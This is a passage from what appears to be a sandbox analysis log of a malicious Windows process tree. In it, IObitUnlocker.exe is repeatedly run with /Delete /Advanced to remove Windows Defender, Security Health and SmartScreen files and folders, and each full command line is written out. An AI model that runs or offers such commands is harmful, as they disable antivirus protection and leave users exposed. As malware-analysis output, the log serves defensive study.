Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
